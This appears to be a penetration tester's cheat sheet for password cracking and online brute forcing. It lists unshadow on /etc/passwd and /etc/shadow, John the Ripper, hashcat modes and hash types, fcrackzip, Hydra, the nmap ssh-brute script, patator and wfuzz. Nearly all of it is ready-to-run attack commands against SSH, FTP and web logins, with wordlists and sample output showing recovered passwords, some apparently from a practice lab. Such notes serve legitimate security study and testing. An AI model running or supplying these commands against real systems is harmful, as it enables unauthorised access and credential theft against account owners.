sudo unshadow /etc/passwd /etc/shadow > users # for cracking
sudo
john --format=zip hash.txt
#same for rar
john <file>
--wordlist=<file.txt>
john --show <file>
--format=
# raw-md5
# raw-sha1
ssh2john
zip2john file.zip > hash.txt
rm ./root/.john/john.pot
$ hashcat <options> <hashes_file> <wordlist>
# attack modes
-a0 # with wordlist
-a3 # brute force
-a3 ?a?a?a?a # four chars long, any char
# ?l, u, d, h, H, s, a, b
# hash type
-m3200 # bcrypt
-m1800 # sha512crypt ($6$)
-m0 # md5
-m100 # sha1
-m1000 # NTLM (windows hashdump)
<https://hashcat.net/wiki/doku.php?id=example_hashes>
$ fcrackzip -b --method 2 -D -p /usr/share/wordlists/rockyou.txt -v ./file.zip
# -b = brute force
# --mehod 2 = zip
# -D = dictionary
# -v = verify
hydra
-l <usename> # single username
-L <usenames.txt> # file of usernames
-p <password> # single password
-P <passwords.txt> # file of passwords
<ip>
-s <port>
http-post-form "/login:username=^USER^&password=^PASS^:invalid" # or :F= ; info from browser/network/post request/headers/edit
ssh
-V # shows username/password
-t 4 # 4 threads, recommended 1/core
$ nmap <ip> --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt -vvv
https://github.com/lanjelot/patator
$ patator
# ftp enumeration
ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
[...]
19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful.
19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied.
# ftp enumeration
ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
[...]
17:45:30 patator FAIL - xxx 41 10.001 | root | 1 | <class '__main__.TimeoutError'> timed out
17:45:34 patator FAIL - xxx 41 10.000 | john | 23 | <class '__main__.TimeoutError'> timed out
# http brute force
http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
http_fuzz url="<http://10.1.1.92/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login>" method=GET header="Cookie:security=low;PHPSESSID=p3tije0mp93ane756j85ar5jbv" 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep="Username and/or password incorrect."
[...]
11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK
wfuzz
-c # colour
-z file,<wordlist>.txt
-u <url>
-d “username=FUZZ&password=FUZZ”
# or
<url>api.php?username=FUZZ&password=FUZ
/usr/share/wordlists
/usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt